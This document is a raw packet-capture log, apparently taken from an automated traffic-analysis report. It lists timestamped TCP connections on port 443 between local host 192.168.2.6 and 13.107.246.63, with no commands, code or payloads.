                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.045463085 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.046672106 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.046696901 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.048793077 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.048830986 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.048921108 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.051661015 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.051688910 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.124907970 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.124978065 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.125083923 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.165798903 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.165817022 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.423516989 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.424235106 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.424257040 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.424834013 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.424840927 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.878196001 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.881395102 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.881489992 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.881527901 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.881548882 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.881561995 CET49885443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.881570101 CET4434988513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.885056019 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.885107040 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.885180950 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.885337114 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:24.885346889 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.787518978 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.788248062 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.788269997 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.788758039 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.788765907 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.950076103 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.950653076 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.950675011 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.951194048 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:25.951200962 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.016701937 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.017366886 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.017402887 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.017956018 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.017961025 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.123481989 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.124099970 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.124133110 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.124573946 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.124577999 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.249687910 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.252959013 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253016949 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253025055 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253091097 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253175020 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253197908 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253212929 CET49886443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.253217936 CET4434988613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.258696079 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.258732080 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.258781910 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.259159088 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.259166956 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.400963068 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.405000925 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.405065060 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.405235052 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.405251980 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.405267954 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.405273914 CET4434988713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.411767960 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.411811113 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.411871910 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.412295103 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.412307024 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.477018118 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.480808020 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.480854034 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.480854034 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.480900049 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.481148958 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.481172085 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.481185913 CET49888443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.481190920 CET4434988813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.487998962 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.488045931 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.488101006 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.490160942 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.490171909 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.587366104 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.588267088 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.588335991 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.591036081 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.591056108 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.591384888 CET49889443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.591392994 CET4434988913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.614612103 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.614659071 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.614727974 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.614980936 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.614993095 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.748372078 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.749095917 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.749119043 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.749596119 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:26.749613047 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.205440998 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.208590984 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.208646059 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.208657980 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.208703995 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.216093063 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.216130972 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.216146946 CET49890443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.216156960 CET4434989013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.242459059 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.242547035 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.242614031 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.242963076 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:27.242988110 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.152950048 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.155584097 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.155605078 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.156285048 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.156295061 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.241370916 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.263468981 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.263569117 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.263938904 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.263964891 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.401818037 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.402657032 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.402683973 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.403137922 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.403150082 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.505507946 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.506295919 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.506319046 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.506767035 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.506776094 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.604809999 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.608099937 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.608261108 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.623569012 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.623617887 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.623639107 CET49891443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.623646021 CET4434989113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.626841068 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.626898050 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.626986980 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.627186060 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.627207994 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695394993 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695424080 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695651054 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695677042 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695811033 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695823908 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695832014 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.695975065 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.696010113 CET4434989213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.696055889 CET49892443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.699167967 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.699224949 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.699323893 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.699525118 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.699538946 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857228994 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857253075 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857372999 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857387066 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857810020 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857821941 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.857831001 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.858212948 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.858244896 CET4434989313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.858284950 CET49893443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.861172915 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.861216068 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.861433029 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.861732960 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.861742020 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.991516113 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.995018005 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.995091915 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.995122910 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:28.995285034 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.001071930 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.001116991 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.001147032 CET49894443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.001157045 CET4434989413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.013003111 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.013061047 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.013130903 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.014373064 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.014399052 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.151143074 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.152368069 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.152401924 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.154000998 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.154009104 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.611290932 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.615499973 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.615556002 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.617361069 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.617384911 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.617415905 CET49895443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.617422104 CET4434989513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.622687101 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.622742891 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.622809887 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.623321056 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:29.623341084 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.401357889 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.404352903 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.404391050 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.404838085 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.404844046 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.488569975 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.533364058 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.565354109 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.565378904 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.568161964 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.568171978 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.589430094 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.634017944 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.634047985 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.634540081 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.634545088 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.742794991 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.783435106 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.843100071 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.843116045 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.843633890 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.843640089 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.866636992 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.869477034 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.869566917 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.869585037 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.869618893 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.969099045 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.969140053 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.969182014 CET49896443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:30.969192028 CET4434989613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.032792091 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.036060095 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.036125898 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.036161900 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.036207914 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.052045107 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.052100897 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.052119017 CET49898443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.052126884 CET4434989813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.174232960 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.174285889 CET4434990113.107.246.63192.168.2.6
